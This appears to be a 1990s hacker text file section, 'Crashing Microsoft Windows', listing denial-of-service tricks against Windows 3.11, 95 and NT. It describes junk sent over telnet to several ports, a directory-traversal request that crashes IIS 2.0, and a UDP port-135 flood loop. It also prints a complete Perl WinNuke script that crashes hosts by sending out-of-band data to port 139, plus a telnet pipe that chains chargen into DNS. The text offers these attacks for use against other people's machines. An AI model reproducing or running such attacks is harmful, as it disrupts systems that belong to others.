CRASHING MICROSOFT WINDOWS
CRASHING MICROSOFT WINDOWS
CONTENT
Microsoft stacks can freeze by a premature expire of dud replies to
DHCP lease information.
If you telnet to port 80 on a NT machine running IIS 2.0 and issue the
command GET ..\.. it will crash.
Windows NT file sharing system is vulnerable to the under Windows 95
famous dot dot bug (dot dot like ..). Meaning that anyone can crash
the system. If someone sends a "DIR ..\" to the workstation will a
STOP messages appear on the screen on the Windows NT computer. Note that
it applies to version 3.50 and 3.51 for both workstation and server
version.
Telnet to port 135 and send some random characters and disconnect.
This will cause the rpcss.exe process to start consuming all
available process cycles.
Telnet to port 6558 and type in one letter and hit enter.
Telnet to port 53 and send some random characters and disconnect.
The Microsoft DNS service terminates when it receives a response
to a DNS query that was never made.
If the NT system have large file caching enable it is easy to eat
100% of the CPU time. Just transfer a large enough file from/to the
server through the shared network drive.
Also try 1031 and 1040.
Port 135 is the RPC endpoint mapper and it is used by a number
of applikcations. The point is that if you send UDP packets to the
port it will send UDP packets back. So we can create a loop that will
flood the network, almost like the unix attack XXXXXXXXXXX
XXXXXXXXXXXXXX. Just send a packet from one NT machines port
135 to another NT machines port 135 in the same network.
Several (most ?) programs like Trumpet Winsock under Windows 3.11
can not handle large ping packets. Also have a look at section
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
You can cause denial of service to any Windows 95, Windows 3.11 (with
Microsoft TCO/IP stack) or Windows NT machine running netbios,
by sending Out Of Band data to an established connection with a windows
user (send to the netbios port at 139).
The NT machine will try to reboot but this will consume all the memory,
both the physical and the virtual. Only A proper shutdown and restart fixes
the problem.
You can use the following perlscript to test the hole.
#!/usr/bin/perl
# Ghent - ghent@bounty-hunters.com - Perl version of winnuke.c by _eci
use strict; use Socket;
my($h,$p,$in_addr,$proto,$addr);
$h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]);
if (!$h) { print "A hostname must be provided. Ex: www.microsoft.com\n"; }
$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;
connect(S,$addr) or die $!; select S; $| = 1; select STDOUT;
print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S;
Just:
$ telnet ntbox 19 | telnet ntbox 53
Some configurations on som Web-servers for PC are known to crash
if you in a W3-client write the IP-number to the machine running
the server.